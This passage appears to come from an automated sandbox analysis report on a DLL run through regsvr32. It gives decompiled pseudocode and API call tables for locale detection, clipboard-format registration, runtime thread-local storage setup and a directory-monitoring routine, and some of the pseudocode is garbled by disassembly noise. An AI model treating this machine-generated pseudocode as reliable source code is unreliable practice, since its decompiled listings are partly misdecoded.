                                                                                                                0x10025bfe
                                                                                                                0x10025c01
                                                                                                                0x10025c13
                                                                                                                0x10025c1f
                                                                                                                0x10025c24
                                                                                                                0x10025c27
                                                                                                                0x10025c27
                                                                                                                0x10025bf2
                                                                                                                0x10025c31
                                                                                                                0x10025c31
                                                                                                                0x10025baa
                                                                                                                0x10025abd
                                                                                                                0x10025ac5
                                                                                                                0x10025ac8
                                                                                                                0x10025acb
                                                                                                                0x10025add
                                                                                                                0x10025ae6
                                                                                                                0x10025aee
                                                                                                                0x10025afb
                                                                                                                0x10025afe
                                                                                                                0x10025b05
                                                                                                                0x10025b09
                                                                                                                0x10025b0d
                                                                                                                0x10025b10
                                                                                                                0x10025b13
                                                                                                                0x10025b20
                                                                                                                0x10025b2c
                                                                                                                0x10025b31
                                                                                                                0x10025b34
                                                                                                                0x10025b34
                                                                                                                0x10025b3b
                                                                                                                0x10025b3b
                                                                                                                0x10025b40
                                                                                                                0x10025b43
                                                                                                                0x10025b5a
                                                                                                                0x10025b61
                                                                                                                0x10025b70
                                                                                                                0x10025ca6
                                                                                                                0x10025cad
                                                                                                                0x10025cbd
                                                                                                                0x10025cc0
                                                                                                                0x10025cc3
                                                                                                                0x10025cca
                                                                                                                0x10025ccd
                                                                                                                0x10025cd4
                                                                                                                0x10025ce0
                                                                                                                0x10025cea
                                                                                                                0x10025cef
                                                                                                                0x10025cef
                                                                                                                0x10025cf4
                                                                                                                0x10025cf9
                                                                                                                0x10025d16
                                                                                                                0x10025d16
                                                                                                                0x10025d1d
                                                                                                                0x10025d22
                                                                                                                0x00000000
                                                                                                                0x10025cfb
                                                                                                                0x10025cfb
                                                                                                                0x10025d02
                                                                                                                0x10025d0a
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x10025d0c
                                                                                                                0x10025d10
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x10025d12
                                                                                                                0x10025d14
                                                                                                                0x00000000
                                                                                                                0x10025d14
                                                                                                                0x10025b76
                                                                                                                0x10025b76
                                                                                                                0x10025d24
                                                                                                                0x10025d27
                                                                                                                0x10025d2f
                                                                                                                0x10025d30
                                                                                                                0x10025d31
                                                                                                                0x10025d46
                                                                                                                0x10025d46

                                                                                                                APIs
                                                                                                                • __EH_prolog3.LIBCMT ref: 10025A81
                                                                                                                • GetModuleHandleA.KERNEL32(kernel32.dll,00000058), ref: 10025AA2
                                                                                                                • GetProcAddress.KERNEL32(00000000,GetUserDefaultUILanguage), ref: 10025AB3
                                                                                                                • ConvertDefaultLocale.KERNEL32(?), ref: 10025AE9
                                                                                                                • ConvertDefaultLocale.KERNEL32(?), ref: 10025AF1
                                                                                                                • GetProcAddress.KERNEL32(?,GetSystemDefaultUILanguage), ref: 10025B05
                                                                                                                • ConvertDefaultLocale.KERNEL32(?), ref: 10025B29
                                                                                                                • ConvertDefaultLocale.KERNEL32(000003FF), ref: 10025B2F
                                                                                                                • GetModuleFileNameA.KERNEL32(10000000,?,00000105), ref: 10025B68
                                                                                                                • GetVersion.KERNEL32 ref: 10025B7D
                                                                                                                • RegOpenKeyExA.ADVAPI32(80000001,Control Panel\Desktop\ResourceLocale,00000000,00020019,?), ref: 10025BA2
                                                                                                                • RegQueryValueExA.ADVAPI32 ref: 10025BC7
                                                                                                                • _sscanf.LIBCMT ref: 10025BE7
                                                                                                                • ConvertDefaultLocale.KERNEL32(?), ref: 10025C1C
                                                                                                                • ConvertDefaultLocale.KERNEL32(72CDFFF6), ref: 10025C22
                                                                                                                • RegCloseKey.ADVAPI32(?), ref: 10025C31
                                                                                                                • GetModuleHandleA.KERNEL32(ntdll.dll), ref: 10025C41
                                                                                                                • EnumResourceLanguagesA.KERNEL32(00000000,00000010,00000001,10025295,?), ref: 10025C5C
                                                                                                                • ConvertDefaultLocale.KERNEL32(?), ref: 10025C8D
                                                                                                                • ConvertDefaultLocale.KERNEL32(72CDFFF6), ref: 10025C93
                                                                                                                • _memset.LIBCMT ref: 10025CAD
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.436101324.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.436097453.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.437451450.0000000010056000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.438223626.000000001006C000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.438384188.0000000010073000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_10000000_regsvr32.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: ConvertDefaultLocale$Module$AddressHandleProc$CloseEnumFileH_prolog3LanguagesNameOpenQueryResourceValueVersion_memset_sscanf
                                                                                                                • String ID: Control Panel\Desktop\ResourceLocale$GetSystemDefaultUILanguage$GetUserDefaultUILanguage$kernel32.dll$ntdll.dll
                                                                                                                • API String ID: 434808117-483790700
                                                                                                                • Opcode ID: b754e3d10a44b5231527069122ae48fa352d8e4aaaa7d0c4de87e4c91800891b
                                                                                                                • Instruction ID: a801d154cf97ba194fb9d738a532f5635c97861277f7c33abf18cda2bae62d62
                                                                                                                • Opcode Fuzzy Hash: b754e3d10a44b5231527069122ae48fa352d8e4aaaa7d0c4de87e4c91800891b
                                                                                                                • Instruction Fuzzy Hash: C8817EB5D0022D9FDB10DFA5EC84AFEBBF5EB48301F50052AE955E3280EB759A04CB64
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 100385E2 Relevance: 42.0, APIs: 12, Strings: 12, Instructions: 44registryclipboardCOMMON
                                                                                                                Download Yara Rule
                                                                                                                C-Code - Quality: 100%
                                                                                                                			E100385E2(intOrPtr* __ecx) {
				intOrPtr* _t27;

				_t27 = __ecx;
				 *_t27 = RegisterClipboardFormatA("Native");
				 *((intOrPtr*)(_t27 + 4)) = RegisterClipboardFormatA("OwnerLink");
				 *((intOrPtr*)(_t27 + 8)) = RegisterClipboardFormatA("ObjectLink");
				 *((intOrPtr*)(_t27 + 0xc)) = RegisterClipboardFormatA("Embedded Object");
				 *((intOrPtr*)(_t27 + 0x10)) = RegisterClipboardFormatA("Embed Source");
				 *((intOrPtr*)(_t27 + 0x14)) = RegisterClipboardFormatA("Link Source");
				 *((intOrPtr*)(_t27 + 0x18)) = RegisterClipboardFormatA("Object Descriptor");
				 *((intOrPtr*)(_t27 + 0x1c)) = RegisterClipboardFormatA("Link Source Descriptor");
				 *((intOrPtr*)(_t27 + 0x20)) = RegisterClipboardFormatA("FileName");
				 *((intOrPtr*)(_t27 + 0x24)) = RegisterClipboardFormatA("FileNameW");
				 *((intOrPtr*)(_t27 + 0x28)) = RegisterClipboardFormatA("Rich Text Format");
				 *((intOrPtr*)(_t27 + 0x2c)) = RegisterClipboardFormatA("RichEdit Text and Objects");
				return _t27;
			}




                                                                                                                0x100385ef
                                                                                                                0x100385f8
                                                                                                                0x10038601
                                                                                                                0x1003860b
                                                                                                                0x10038615
                                                                                                                0x1003861f
                                                                                                                0x10038629
                                                                                                                0x10038633
                                                                                                                0x1003863d
                                                                                                                0x10038647
                                                                                                                0x10038651
                                                                                                                0x1003865b
                                                                                                                0x10038660
                                                                                                                0x10038667

                                                                                                                APIs
                                                                                                                • RegisterClipboardFormatA.USER32(Native), ref: 100385F1
                                                                                                                • RegisterClipboardFormatA.USER32(OwnerLink), ref: 100385FA
                                                                                                                • RegisterClipboardFormatA.USER32(ObjectLink), ref: 10038604
                                                                                                                • RegisterClipboardFormatA.USER32(Embedded Object), ref: 1003860E
                                                                                                                • RegisterClipboardFormatA.USER32(Embed Source), ref: 10038618
                                                                                                                • RegisterClipboardFormatA.USER32(Link Source), ref: 10038622
                                                                                                                • RegisterClipboardFormatA.USER32(Object Descriptor), ref: 1003862C
                                                                                                                • RegisterClipboardFormatA.USER32(Link Source Descriptor), ref: 10038636
                                                                                                                • RegisterClipboardFormatA.USER32(FileName), ref: 10038640
                                                                                                                • RegisterClipboardFormatA.USER32(FileNameW), ref: 1003864A
                                                                                                                • RegisterClipboardFormatA.USER32(Rich Text Format), ref: 10038654
                                                                                                                • RegisterClipboardFormatA.USER32(RichEdit Text and Objects), ref: 1003865E
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.436101324.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.436097453.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.437451450.0000000010056000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.438223626.000000001006C000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.438384188.0000000010073000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_10000000_regsvr32.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: ClipboardFormatRegister
                                                                                                                • String ID: Embed Source$Embedded Object$FileName$FileNameW$Link Source$Link Source Descriptor$Native$Object Descriptor$ObjectLink$OwnerLink$Rich Text Format$RichEdit Text and Objects
                                                                                                                • API String ID: 1228543026-2889995556
                                                                                                                • Opcode ID: 1d3ef6582553aa21d58ef3369c5ac9c0c531466eba49a8f283764fcab4366065
                                                                                                                • Instruction ID: 5eacbbfad766d42ac76e24c0f8361814f61b6bfb24531249b0a3c5242fdecd40
                                                                                                                • Opcode Fuzzy Hash: 1d3ef6582553aa21d58ef3369c5ac9c0c531466eba49a8f283764fcab4366065
                                                                                                                • Instruction Fuzzy Hash: 6F0148749047985ACB30FFB69C08C8BBEE5EED46103024D2FE19987610E774D14ACF84
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 10042CC5 Relevance: 40.4, APIs: 18, Strings: 5, Instructions: 109libraryloadermemoryCOMMONLIBRARYCODE
                                                                                                                Download Yara Rule
                                                                                                                C-Code - Quality: 91%
                                                                                                                			E10042CC5(void* __ebx) {
				void* __edi;
				void* __esi;
				_Unknown_base(*)()* _t7;
				long _t10;
				void* _t11;
				int _t12;
				void* _t18;
				intOrPtr _t21;
				long _t26;
				void* _t30;
				struct HINSTANCE__* _t37;
				void* _t40;
				void* _t42;

				_t30 = __ebx;
				_t37 = GetModuleHandleA("KERNEL32.DLL");
				if(_t37 != 0) {
					 *0x10070fc8 = GetProcAddress(_t37, "FlsAlloc");
					 *0x10070fcc = GetProcAddress(_t37, "FlsGetValue");
					 *0x10070fd0 = GetProcAddress(_t37, "FlsSetValue");
					_t7 = GetProcAddress(_t37, "FlsFree");
					__eflags =  *0x10070fc8;
					_t40 = TlsSetValue;
					 *0x10070fd4 = _t7;
					if( *0x10070fc8 == 0) {
						L6:
						 *0x10070fcc = TlsGetValue;
						 *0x10070fc8 = E10042948;
						 *0x10070fd0 = _t40;
						 *0x10070fd4 = TlsFree;
					} else {
						__eflags =  *0x10070fcc;
						if( *0x10070fcc == 0) {
							goto L6;
						} else {
							__eflags =  *0x10070fd0;
							if( *0x10070fd0 == 0) {
								goto L6;
							} else {
								__eflags = _t7;
								if(_t7 == 0) {
									goto L6;
								}
							}
						}
					}
					_t10 = TlsAlloc();
					__eflags = _t10 - 0xffffffff;
					 *0x1006dde8 = _t10;
					if(_t10 == 0xffffffff) {
						L15:
						_t11 = 0;
						__eflags = 0;
					} else {
						_t12 = TlsSetValue(_t10,  *0x10070fcc);
						__eflags = _t12;
						if(_t12 == 0) {
							goto L15;
						} else {
							E10040E2D();
							 *0x10070fc8 = E10042879( *0x10070fc8);
							 *0x10070fcc = E10042879( *0x10070fcc);
							 *0x10070fd0 = E10042879( *0x10070fd0);
							 *0x10070fd4 = E10042879( *0x10070fd4);
							_t18 = E10043128();
							__eflags = _t18;
							if(_t18 == 0) {
								L14:
								E100429AF();
								goto L15;
							} else {
								_push(E10042B3B);
								_t21 =  *((intOrPtr*)(E100428E5( *0x10070fc8)))();
								__eflags = _t21 - 0xffffffff;
								 *0x1006dde4 = _t21;
								if(_t21 == 0xffffffff) {
									goto L14;
								} else {
									_t42 = E10046749(1, 0x214);
									__eflags = _t42;
									if(_t42 == 0) {
										goto L14;
									} else {
										_push(_t42);
										_push( *0x1006dde4);
										__eflags =  *((intOrPtr*)(E100428E5( *0x10070fd0)))();
										if(__eflags == 0) {
											goto L14;
										} else {
											_push(0);
											_push(_t42);
											E100429EC(_t30, _t37, _t42, __eflags);
											_t26 = GetCurrentThreadId();
											 *(_t42 + 4) =  *(_t42 + 4) | 0xffffffff;
											 *_t42 = _t26;
											_t11 = 1;
										}
									}
								}
							}
						}
					}
					return _t11;
				} else {
					E100429AF();
					return 0;
				}
			}
















                                                                                                                0x10042cc5
                                                                                                                0x10042cd1
                                                                                                                0x10042cd5
                                                                                                                0x10042cf5
                                                                                                                0x10042d02
                                                                                                                0x10042d0f
                                                                                                                0x10042d14
                                                                                                                0x10042d16
                                                                                                                0x10042d1d
                                                                                                                0x10042d23
                                                                                                                0x10042d28
                                                                                                                0x10042d40
                                                                                                                0x10042d45
                                                                                                                0x10042d4f
                                                                                                                0x10042d59
                                                                                                                0x10042d5f
                                                                                                                0x10042d2a
                                                                                                                0x10042d2a
                                                                                                                0x10042d31
                                                                                                                0x00000000
                                                                                                                0x10042d33
                                                                                                                0x10042d33
                                                                                                                0x10042d3a
                                                                                                                0x00000000
                                                                                                                0x10042d3c
                                                                                                                0x10042d3c
                                                                                                                0x10042d3e
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x10042d3e
                                                                                                                0x10042d3a
                                                                                                                0x10042d31
                                                                                                                0x10042d64
                                                                                                                0x10042d6a
                                                                                                                0x10042d6d
                                                                                                                0x10042d72
                                                                                                                0x10042e44
                                                                                                                0x10042e44
                                                                                                                0x10042e44
                                                                                                                0x10042d78
                                                                                                                0x10042d7f
                                                                                                                0x10042d81
                                                                                                                0x10042d83
                                                                                                                0x00000000
                                                                                                                0x10042d89
                                                                                                                0x10042d89
                                                                                                                0x10042d9f
                                                                                                                0x10042daf
                                                                                                                0x10042dbf
                                                                                                                0x10042dcc
                                                                                                                0x10042dd1
                                                                                                                0x10042dd6
                                                                                                                0x10042dd8
                                                                                                                0x10042e3f
                                                                                                                0x10042e3f
                                                                                                                0x00000000
                                                                                                                0x10042dda
                                                                                                                0x10042dda
                                                                                                                0x10042deb
                                                                                                                0x10042ded
                                                                                                                0x10042df0
                                                                                                                0x10042df5
                                                                                                                0x00000000
                                                                                                                0x10042df7
                                                                                                                0x10042e03
                                                                                                                0x10042e05
                                                                                                                0x10042e09
                                                                                                                0x00000000
                                                                                                                0x10042e0b
                                                                                                                0x10042e0b
                                                                                                                0x10042e0c
                                                                                                                0x10042e20
                                                                                                                0x10042e22
                                                                                                                0x00000000
                                                                                                                0x10042e24
                                                                                                                0x10042e24
                                                                                                                0x10042e26
                                                                                                                0x10042e27
                                                                                                                0x10042e2e
                                                                                                                0x10042e34
                                                                                                                0x10042e38
                                                                                                                0x10042e3c
                                                                                                                0x10042e3c
                                                                                                                0x10042e22
                                                                                                                0x10042e09
                                                                                                                0x10042df5
                                                                                                                0x10042dd8
                                                                                                                0x10042d83
                                                                                                                0x10042e48
                                                                                                                0x10042cd7
                                                                                                                0x10042cd7
                                                                                                                0x10042cdf
                                                                                                                0x10042cdf

                                                                                                                APIs
                                                                                                                • GetModuleHandleA.KERNEL32(KERNEL32.DLL,?,1003CFA2,?,?,00000001,?,?,1003D112,00000001,?,?,10068BB8,0000000C,1003D1CC,?), ref: 10042CCB
                                                                                                                • __mtterm.LIBCMT ref: 10042CD7
                                                                                                                  • Part of subcall function 100429AF: __decode_pointer.LIBCMT ref: 100429C0
                                                                                                                  • Part of subcall function 100429AF: TlsFree.KERNEL32(00000022,1003D03E,?,?,00000001,?,?,1003D112,00000001,?,?,10068BB8,0000000C,1003D1CC,?), ref: 100429DA
                                                                                                                  • Part of subcall function 100429AF: DeleteCriticalSection.KERNEL32(00000000,00000000,?,00000001,1003D03E,?,?,00000001,?,?,1003D112,00000001,?,?,10068BB8,0000000C), ref: 1004318C
                                                                                                                  • Part of subcall function 100429AF: DeleteCriticalSection.KERNEL32(00000022,?,00000001,1003D03E,?,?,00000001,?,?,1003D112,00000001,?,?,10068BB8,0000000C,1003D1CC), ref: 100431B6
                                                                                                                • GetProcAddress.KERNEL32(00000000,FlsAlloc,00000000,?,?,00000001,?,?,1003D112,00000001,?,?,10068BB8,0000000C,1003D1CC,?), ref: 10042CED
                                                                                                                • GetProcAddress.KERNEL32(00000000,FlsGetValue,?,?,00000001,?,?,1003D112,00000001,?,?,10068BB8,0000000C,1003D1CC,?), ref: 10042CFA
                                                                                                                • GetProcAddress.KERNEL32(00000000,FlsSetValue,?,?,00000001,?,?,1003D112,00000001,?,?,10068BB8,0000000C,1003D1CC,?), ref: 10042D07
                                                                                                                • GetProcAddress.KERNEL32(00000000,FlsFree,?,?,00000001,?,?,1003D112,00000001,?,?,10068BB8,0000000C,1003D1CC,?), ref: 10042D14
                                                                                                                • TlsAlloc.KERNEL32(?,?,00000001,?,?,1003D112,00000001,?,?,10068BB8,0000000C,1003D1CC,?), ref: 10042D64
                                                                                                                • TlsSetValue.KERNEL32(00000000,?,?,00000001,?,?,1003D112,00000001,?,?,10068BB8,0000000C,1003D1CC,?), ref: 10042D7F
                                                                                                                • __init_pointers.LIBCMT ref: 10042D89
                                                                                                                • __encode_pointer.LIBCMT ref: 10042D94
                                                                                                                • __encode_pointer.LIBCMT ref: 10042DA4
                                                                                                                • __encode_pointer.LIBCMT ref: 10042DB4
                                                                                                                • __encode_pointer.LIBCMT ref: 10042DC4
                                                                                                                • __decode_pointer.LIBCMT ref: 10042DE5
                                                                                                                • __calloc_crt.LIBCMT ref: 10042DFE
                                                                                                                • __decode_pointer.LIBCMT ref: 10042E18
                                                                                                                • GetCurrentThreadId.KERNEL32 ref: 10042E2E
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.436101324.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.436097453.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.437451450.0000000010056000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.438223626.000000001006C000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.438384188.0000000010073000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_10000000_regsvr32.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: AddressProc__encode_pointer$__decode_pointer$CriticalDeleteSection$AllocCurrentFreeHandleModuleThreadValue__calloc_crt__init_pointers__mtterm
                                                                                                                • String ID: FlsAlloc$FlsFree$FlsGetValue$FlsSetValue$KERNEL32.DLL
                                                                                                                • API String ID: 4287529916-3819984048
                                                                                                                • Opcode ID: 330b7659c0cf517c1b391319ca8ecaf1eead31755eba3ee6cfc28da1b321ddf3
                                                                                                                • Instruction ID: f169a89df455118cb9e58d0714aa08d53c3bb3dbc95a3bfd64ba54b1ba44162f
                                                                                                                • Opcode Fuzzy Hash: 330b7659c0cf517c1b391319ca8ecaf1eead31755eba3ee6cfc28da1b321ddf3
                                                                                                                • Instruction Fuzzy Hash: 48317239A01321DAF760EF759C8560A3BA4EB44361B60073AF480F75B5DB79D8C1CB68
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 10015540 Relevance: 35.4, APIs: 19, Strings: 1, Instructions: 416fileCOMMON
                                                                                                                Download Yara Rule
                                                                                                                C-Code - Quality: 77%
                                                                                                                			E10015540(void* __ebx, void* __edi) {
				signed int __esi;
				signed int _t207;
				signed int _t209;
				void* _t213;
				void* _t221;
				intOrPtr _t222;
				signed int _t224;
				intOrPtr _t229;
				signed int _t230;
				signed int _t247;
				signed int _t249;
				signed int _t251;
				intOrPtr* _t259;
				void* _t283;
				void* _t285;
				char _t292;
				void* _t296;
				signed int _t310;
				char* _t327;
				void* _t346;
				signed int _t347;
				signed int _t349;
				intOrPtr _t350;
				short* _t353;
				void* _t354;
				void* _t355;
				signed int _t360;
				intOrPtr _t362;
				void* _t364;
				signed int _t365;
				void* _t367;
				void* _t368;
				void* _t371;
				void* _t372;
				void* _t373;

				_t284 = __ebx;
				_push(0xffffffff);
				_push(E10052952);
				_push( *[fs:0x0]);
				_t365 = _t364 - 0x648;
				_t207 =  *0x1006dbdc; // 0xdf7c0cda
				 *(_t365 + 0x644) = _t207 ^ _t365;
				_push(__ebx);
				_push(_t353);
				_push(__edi);
				_t209 =  *0x1006dbdc; // 0xdf7c0cda
				_push(_t209 ^ _t365);
				 *[fs:0x0] = _t365 + 0x65c;
				_t362 =  *((intOrPtr*)(_t365 + 0x66c));
				 *(_t362 + 0x90) = 0;
				_t213 = CreateFileA( *(_t362 + 0x78), 0xc0000000, 7, 0, 3, 0x2000000, 0);
				 *(_t362 + 0xec) = _t213;
				if(_t213 == 0xffffffff) {
					L102:
					 *[fs:0x0] =  *((intOrPtr*)(_t365 + 0x65c));
					_pop(_t346);
					_pop(_t354);
					_pop(_t285);
					return E1003B437(0, _t285,  *(_t365 + 0x644) ^ _t365, _t325, _t346, _t354);
				} else {
					_t325 = _t365 + 0x344;
					if(ReadDirectoryChangesW(_t213, _t365 + 0x344, 0x228, 1, 0x17f, _t365 + 0x50, 0, 0) != 0) {
						do {
							_t347 = WideCharToMultiByte;
							E1003BB70(WideCharToMultiByte, _t365 + 0x22c, 0, 0x104);
							_t367 = _t365 + 0xc;
							_t327 =  *(_t365 + 0x340) >> 1;
							WideCharToMultiByte(0, 0, _t367 + 0x34c, _t327, _t367 + 0x234, 0x63, 0, 0);
							_t221 = 0;
							do {
								_t292 =  *((intOrPtr*)(_t367 + _t221 + 0x228));
								 *((char*)(_t367 + _t221 + 0x124)) = _t292;
								_t221 = _t221 + 1;
							} while (_t292 != 0);
							_t222 =  *((intOrPtr*)(_t367 + 0x32c));
							if(_t222 != 0) {
								_t355 = _t367 + _t222 + 0x338;
								E1003BB70(WideCharToMultiByte, _t367 + 0x22c, 0, 0x104);
								_t367 = _t367 + 0xc;
								_t327 = _t367 + 0x234;
								_t353 = _t355 + 0xc;
								WideCharToMultiByte(0, 0, _t353,  *(_t355 + 8) >> 1, _t327, 0x63, 0, 0);
								_t283 = 0;
								do {
									_t292 =  *((intOrPtr*)(_t367 + _t283 + 0x228));
									 *((char*)(_t367 + _t283 + 0x554)) = _t292;
									_t283 = _t283 + 1;
								} while (_t292 != 0);
							}
							_t224 =  *((intOrPtr*)(_t367 + 0x330)) + 0xffffffff;
							if(_t224 > 4) {
								__eflags =  *(_t362 + 0x8c);
								if(__eflags == 0) {
									goto L101;
								} else {
									_t229 = E1003CEA4(_t292, _t327, __eflags, 0);
									_t368 = _t367 + 4;
									 *((intOrPtr*)(_t368 + 0x38)) = _t229;
									 *(_t368 + 0x3c) = _t327;
									_t230 = E100173A6();
									__eflags = _t230;
									_t296 = 0 | _t230 != 0x00000000;
									__eflags = _t296;
									if(_t296 == 0) {
										goto L103;
									} else {
										 *((intOrPtr*)(_t368 + 0x14)) =  *((intOrPtr*)( *((intOrPtr*)( *_t230 + 0xc))))() + 0x10;
										_t335 = _t368 + 0x104;
										 *((intOrPtr*)(_t368 + 0x66c)) = 5;
										_t247 = E1003CBFC(_t284, _t368 + 0x104, _t368 + 0x104, _t368 + 0x38);
										_t371 = _t368 + 8;
										__eflags = _t247;
										if(_t247 != 0) {
											_t349 = _t347 | 0xffffffff;
											__eflags = _t349;
										} else {
											_t349 =  *(_t371 + 0x100);
										}
										_t249 = E1003CBFC(_t284, _t335, _t371 + 0xe0, _t371 + 0x38);
										_t372 = _t371 + 8;
										__eflags = _t249;
										if(_t249 != 0) {
											_t360 = _t353 | 0xffffffff;
											__eflags = _t360;
										} else {
											_t360 =  *(_t372 + 0xe0);
										}
										_t251 = E1003CBFC(_t284, _t372 + 0x38, _t372 + 0xbc, _t372 + 0x38);
										_t373 = _t372 + 8;
										__eflags = _t251;
										if(_t251 != 0) {
											_t252 = _t251 | 0xffffffff;
											__eflags = _t251 | 0xffffffff;
										} else {
											_t252 =  *(_t373 + 0xc0);
										}
										_push(_t349);
										_push(_t360);
										E10003500(_t373 + 0x20, "%d:%d:%d", _t252);
										_t367 = _t373 + 0x14;
										_t353 = _t362 + 0x94;
										E10026562(_t353, 1, 0,  *((intOrPtr*)(_t362 + 0x74)), 0, 0, 0, 0);
										E1002637C(_t353, 0, 2, 0x10059ee0);
										E1002637C(_t353, 0, 3, 0x10056948);
										_t350 =  *((intOrPtr*)(_t367 + 0x14));
										_t310 = _t353;
										E1002637C(_t310, 0, 1, _t350);
										_t259 = _t350 - 0x10;
										 *((intOrPtr*)(_t367 + 0x664)) = 0xffffffff;
										asm("lock xadd [edx], ecx");
										__eflags = (_t310 | 0xffffffff) - 1;
										goto L99;
									}
								}
							} else {
								switch( *((intOrPtr*)(_t224 * 4 +  &M10015EA0))) {
									case 0:
										_t385 =  *((intOrPtr*)(_t362 + 0x7c));
										if( *((intOrPtr*)(_t362 + 0x7c)) == 0) {
											goto L101;
										} else {
											_t262 = E1003CEA4(_t292, _t327, _t385, 0);
											_t374 = _t367 + 4;
											 *((intOrPtr*)(_t374 + 0x30)) = _t262;
											 *(_t374 + 0x34) = _t327;
											_t263 = E100173A6();
											_t296 = 0 | _t263 != 0x00000000;
											if(_t296 == 0) {
												goto L103;
											} else {
												 *((intOrPtr*)(_t374 + 0x14)) =  *((intOrPtr*)( *((intOrPtr*)( *_t263 + 0xc))))() + 0x10;
												_t340 = _t374 + 0x50;
												 *(_t374 + 0x66c) = 0;
												_t267 = E1003CBFC(_t284, _t374 + 0x50, _t374 + 0x50, _t374 + 0x30);
												_t375 = _t374 + 8;
												if(_t267 != 0) {
													_t351 = _t347 | 0xffffffff;
													__eflags = _t351;
												} else {
													_t351 =  *(_t375 + 0x4c);
												}
												_t269 = E1003CBFC(_t284, _t340, _t375 + 0x74, _t375 + 0x30);
												_t376 = _t375 + 8;
												if(_t269 != 0) {
													_t359 = _t353 | 0xffffffff;
													__eflags = _t359;
												} else {
													_t359 =  *(_t376 + 0x74);
												}
												_t271 = E1003CBFC(_t284, _t376 + 0x30, _t376 + 0x98, _t376 + 0x30);
												_t377 = _t376 + 8;
												if(_t271 != 0) {
													_t272 = _t271 | 0xffffffff;
													__eflags = _t271 | 0xffffffff;
												} else {
													_t272 =  *(_t377 + 0x9c);
												}
												_push(_t351);
												_push(_t359);
												E10003500(_t377 + 0x20, "%d:%d:%d", _t272);
												_t367 = _t377 + 0x14;
												_t353 = _t362 + 0x94;
												E10026562(_t353, 1, 0,  *((intOrPtr*)(_t362 + 0x74)), 0, 0, 0, 0);
												_push(0x10059f24);
												goto L21;
											}
										}
										goto L107;
									case 1:
										__eflags =  *(__ebp + 0x80);
										if(__eflags == 0) {
											goto L101;
										} else {
											 *(__esp + 0x18) = E1003CEA4(__ecx, __edx, __eflags, 0);
											 *((intOrPtr*)(__esp + 0x1c)) = __edx;
											__eax = E100173A6();
											__ecx = 0;
											__eflags = __eax;
											__ecx = 0 | __eax != 0x00000000;
											__eflags = __ecx;
											if(__ecx == 0) {
												L103:
												_t231 = E10001000(_t296, _t327, 0x80004005);
												_push(0xf2100156);
												 *_t231 =  *_t231 + _t327;
												asm("in al, 0x5b");
												 *_t231 =  *_t231 + _t327;
												_pop(_t369);
												_pop(_t328);
												 *_t231 =  *_t231 + _t328;
												asm("fistp word [eax+0x1]");
												asm("adc ah, cl");
												asm("int3");
												asm("int3");
												asm("int3");
												asm("int3");
												asm("int3");
												asm("int3");
												asm("int3");
												asm("int3");
												asm("int3");
												asm("int3");
												asm("int3");
												_push(0xffffffff);
												_push(E10052988);
												_push( *[fs:0x0]);
												_push(_t296);
												_push(_t353);
												_t233 =  *0x1006dbdc; // 0xdf7c0cda
												_push(_t233 ^ _t369);
												_t193 = _t369 + 0xc; // 0xf210014e
												 *[fs:0x0] = _t193;
												_t356 = _t296;
												_t194 = _t369 + 0x1c; // 0xf210015e
												_push(_t194);
												 *(_t369 + 0x18) = 0;
												E10001FF0(_t356 + 0x78);
												_t197 = _t369 + 8; // 0xf2100146
												_t238 = CreateThread(0, 0, E10015540, _t356, 0xfffffff1, _t197);
												__eflags = _t238;
												_t330 = 0 | _t238 != 0x00000000;
												 *(_t356 + 0xe8) = _t238;
												_t240 =  *((intOrPtr*)(_t369 + 0x1c)) + 0xfffffff0;
												 *((intOrPtr*)(_t369 + 0x14)) = 0xffffffff;
												_t357 = _t330;
												asm("lock xadd [ecx], edx");
												__eflags = (_t330 | 0xffffffff) - 1;
												if((_t330 | 0xffffffff) - 1 <= 0) {
													_push(_t240);
													 *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)( *_t240)) + 4))))();
												}
												 *[fs:0x0] =  *((intOrPtr*)(_t369 + 0xc));
												return _t357;
											} else {
												__edx =  *__eax;
												__ecx = __eax;
												 *((intOrPtr*)(__edx + 0xc)) =  *((intOrPtr*)( *((intOrPtr*)(__edx + 0xc))))();
												__eax =  *((intOrPtr*)(__edx + 0xc)) + 0x10;
